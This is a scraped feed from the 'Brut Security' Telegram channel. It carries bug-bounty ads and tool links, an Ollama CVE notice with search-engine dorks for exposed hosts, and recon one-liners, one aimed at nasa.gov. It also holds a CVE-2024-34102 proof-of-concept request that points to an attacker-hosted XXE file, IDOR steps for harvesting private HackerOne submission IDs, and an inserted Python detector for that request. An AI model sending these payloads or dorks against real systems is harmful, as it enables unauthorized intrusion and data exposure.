Brut Security – Telegram
Brut Security
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
ceh-v12-exam-set.pdf
1.6 MB
☄️Sharpen your skills for the Certified Ethical Hacker v12 exam with these practice questions☄️
Subdomain Enumeration Tools UHD.pdf
127.4 KB
Subdomain Enumeration Tools

#bugbounty #bugbountytips
🔫Smap - passive Nmap like scanner built with shodan.io

😠Smap is a port scanner built with shodan.io's free API. It takes the same command line arguments as Nmap and produces the same output, which makes it a drop-in replacement for Nmap.

🤨 Read more: https://github.com/s0md3v/Smap

😐#infosec #cybersecurity #hacking #pentesting #security
▶️This June Batch Filled with talented Students 🫶

👀July Batch Registration is Open
https://wa.me/message/NQLPOBIAEFDBN1
Looking for someone who can contribute to the next 30-day Bug Bounty Challenge.

Similar to this https://nas.io/brutsecurity
🚨CVE-2024-37032: Probllama—Ollama Remote Code Execution Vulnerability

⚠️The issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit it to overwrite arbitrary files on the server, ultimately leading to remote code execution.

🔥PoC:
https://lnkd.in/gk6Wvq_P

💥Dorks:
Hunter: /product.name="Ollama Web"
FOFA: app="Ollama-Web"
🛡Join The Discussion Group
🔗https://news.1rj.ru/str/brutsec
CVE-2024-34102 POC

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
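A defender-side check for the request shown in the post above, as an added example that is not part of the original post: it walks a logged JSON request body and flags any nested `sourceData` object, noting whether `dataIsURL` is set. The key names come from the posted body; the function names, the `/rest/` prefix match and the sample requests are assumptions constructed for illustration.

```python
import json

# Key names taken from the request body shown in the post above.
SUSPECT_KEY = "sourceData"
URL_FLAG = "dataIsURL"


def find_source_data(node, path="$"):
    """Yield (json_path, value) for every 'sourceData' entry at any depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == SUSPECT_KEY:
                yield child, value
            yield from find_source_data(value, child)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from find_source_data(item, f"{path}[{i}]")


def inspect_request(method, uri, body):
    """Return findings for one logged REST request (empty list = nothing flagged)."""
    # Assumption: REST routes are served under /rest/ as in the posted request.
    if method.upper() != "POST" or not uri.startswith("/rest/"):
        return []
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return []  # body is not JSON; out of scope for this check
    findings = []
    for where, value in find_source_data(doc):
        is_obj = isinstance(value, dict)
        findings.append({
            "path": where,
            "remote_fetch": is_obj and bool(value.get(URL_FLAG)),
            "data": value.get("data") if is_obj else None,
        })
    return findings


# Constructed sample requests (not real traffic).
SAMPLES = [
    ("POST", "/rest/V1/guest-carts/1/estimate-shipping-methods",
     '{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":'
     '{"data":"http://collab.example/xxe.xml","dataIsURL":true,"options":1337}}}}}}'),
    ("POST", "/rest/V1/guest-carts/1/estimate-shipping-methods",
     '{"address":{"country_id":"US","postcode":"10001"}}'),
]

if __name__ == "__main__":
    for method, uri, body in SAMPLES:
        print(uri, inspect_request(method, uri, body))
```

The same walk can run in a WAF hook or over stored request logs; a hit on a guest-cart endpoint is worth triage because an ordinary address payload has no reason to carry these keys.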
IDOR on HackerOne Embedded Submission Form 💰 💲
-
Steps to reproduce (obtaining inactive UUID of many private programs)

1- Use this command: echo 'https://hackerone.com/' | waybackurls > lists.txt (make sure you have waybackurls installed on your attackbox)
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission IDs of many random private programs; you can check them by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino
China now has their own GitHub/public Git repository hosting service called GitCode; it is owned and operated by CSDN under the company name "重庆开源共创科技有限公司"

It is being reported that many users' repositories are being cloned and re-hosted on GitCode without authorization - meaning your project may very well be on this service without you explicitly allowing it.

tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.

Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA


#github #gitcode
⚠️As I have asked everyone, I will elaborate it more here:

🌐We need contributors who want to contribute to the 30-day Bug Bounty Challenge, where the participants can learn from day 1 to day 30, as guidance would have to be provided, e.g.:
Day 1: Run Subfinder
Day 2: Scrape JS
Day 3: Report etc. till day 30.

🙂If you want to collaborate or participate, make a Day 1 to Day 30 challenge or a topic and DM it to me @wtf_brut, or you can DM here 🔽
⚠️No Foul Language Will Be Tolerated in the Comments or in the community discussion⚠️
Brut Security pinned «💥Join Our Bugbounty Discussion Group 💥 🔥https://news.1rj.ru/str/brutsec🔥 🤖https://discord.gg/GZBsQMY6🤖»
⚔️Pentest-Windows
🔰Windows11 Penetration Suite Toolkit

📌A Windows penetration testing environment that works out of the box.

⚠️This project was created for educational purposes and should not be used in environments without legal authorization.

🔗Link: https://lnkd.in/gtX3GbR8

🔖#infosec #cybersecurity #hacking #pentesting #security #oscp #ceh #nmap #hackingtools #networksecurity
📢You can now passively enumerate all endpoints of a website with katana. (No need for waybackurls)

📝Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints



🚨You can then check the status of these endpoints or filter in order to find new vulnerabilities:

Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints